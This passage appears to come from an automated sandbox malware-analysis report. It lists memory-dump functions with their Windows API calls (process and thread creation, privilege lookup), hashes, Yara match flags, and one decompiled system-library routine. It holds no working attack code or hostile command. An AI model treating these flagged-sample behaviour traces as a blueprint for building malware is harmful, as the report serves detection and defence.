                                                                          • Instruction Fuzzy Hash: 23010CBDD4020DABDB10EAA4DC82F9EB7799B54308F004295ED08D7240FA31EB148B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02858530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02858584
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateInternalProcess
                                                                          • String ID:
                                                                          • API String ID: 2186235152-0
                                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction ID: afc8133596852ebde2118c98bf37737031ba224359dda6a99fcd42125cae13e4
                                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                          • Instruction Fuzzy Hash: B601AFB6210108AFCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02857000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0284CCC0,?,?), ref: 0285703C
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
                                                                          • Instruction ID: 909a8a09640fe744241d600efc18f5e7d48cb88644709f07074c1aad40cb7072
                                                                          • Opcode Fuzzy Hash: 89b5fcddf5cf94ebe47764815518dfbcb350786f50de0af2faf284d80b108530
                                                                          • Instruction Fuzzy Hash: 2BE0923B3903143AE730659DAC02FA7B39DCB81B60F140026FE0DEB2C0D595F80146A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02858620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0284CF92,0284CF92,?,00000000,?,?), ref: 02858650
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction ID: 2ea80ee1df8f23ce81f0099aca98189191d28425354ede54c72f4906ebb61820
                                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                          • Instruction Fuzzy Hash: 46E01AB52002186BDB10DF49CC84EE737ADAF88650F018155BE0857241CA30F8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02858480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(02853506,?,02853C7F,02853C7F,?,02853506,?,?,?,?,?,00000000,00000000,?), ref: 028584AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction ID: 56bb0ec40d6f371bf01e85d1417b0456f13ed79da14637ef93a5fe8b523ffa63
                                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                          • Instruction Fuzzy Hash: C2E012B5200218ABDB14EF99CC40EA777ADAF88650F118559BE089B241CA30F9108AF0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0284D400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02847C63,?), ref: 0284D42B
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.475870538.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction ID: e8714b874f4ff4cedc470a22848f048409932c34a1ed7bb38a08c9a30dd91576
                                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                          • Instruction Fuzzy Hash: F2D0A7797903083BEA10FAA89C03F2632CD9B44B44F494064F94DE73C3DE50F4004561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 046B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: d79a0f6c5f8e9ef1f3fbd4b58be6ae5dcdfa55dce1d426aa6b0ebf9c35b5b141
                                                                          • Instruction ID: d037373b1d7316b8ca90f200787eba59f72bc5dc0acdfdb60fd767cc6c7c8a58
                                                                          • Opcode Fuzzy Hash: d79a0f6c5f8e9ef1f3fbd4b58be6ae5dcdfa55dce1d426aa6b0ebf9c35b5b141
                                                                          • Instruction Fuzzy Hash: 0CB09BF19014C5C5F715DB6046087277904B7D1745F26C066D2420691A5778D0D5F6F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0470FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E0470FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E046BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04705720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04705720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                          0x0470fdda
                                                                          0x0470fde2
                                                                          0x0470fde5
                                                                          0x0470fdec
                                                                          0x0470fdfa
                                                                          0x0470fdff
                                                                          0x0470fe0a
                                                                          0x0470fe0f
                                                                          0x0470fe17
                                                                          0x0470fe1e
                                                                          0x0470fe19
                                                                          0x0470fe19
                                                                          0x0470fe19
                                                                          0x0470fe20
                                                                          0x0470fe21
                                                                          0x0470fe22
                                                                          0x0470fe25
                                                                          0x0470fe40

                                                                          APIs
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0470FDFA
                                                                          Strings
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0470FE2B
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0470FE01
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.476522146.0000000004650000.00000040.00000001.sdmp, Offset: 04650000, based on PE: true
                                                                          • Associated: 00000007.00000002.476968277.000000000476B000.00000040.00000001.sdmp Download File
                                                                          • Associated: 00000007.00000002.476980303.000000000476F000.00000040.00000001.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                          • API String ID: 885266447-3903918235
                                                                          • Opcode ID: 815c65749913338e34d79ae7bc5071c3dae51ea9cbe5390e6a37bfb89dbb28b3
                                                                          • Instruction ID: 79ea92d123688e6319c47d82bf9f0d3b96166d76a493fec6b51ea5b61c2ecd98
                                                                          • Opcode Fuzzy Hash: 815c65749913338e34d79ae7bc5071c3dae51ea9cbe5390e6a37bfb89dbb28b3
                                                                          • Instruction Fuzzy Hash: 9DF0F672200601FFE7201A55DC0AF23BB9EEB44730F144358F628562D1EAA2F8609BF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%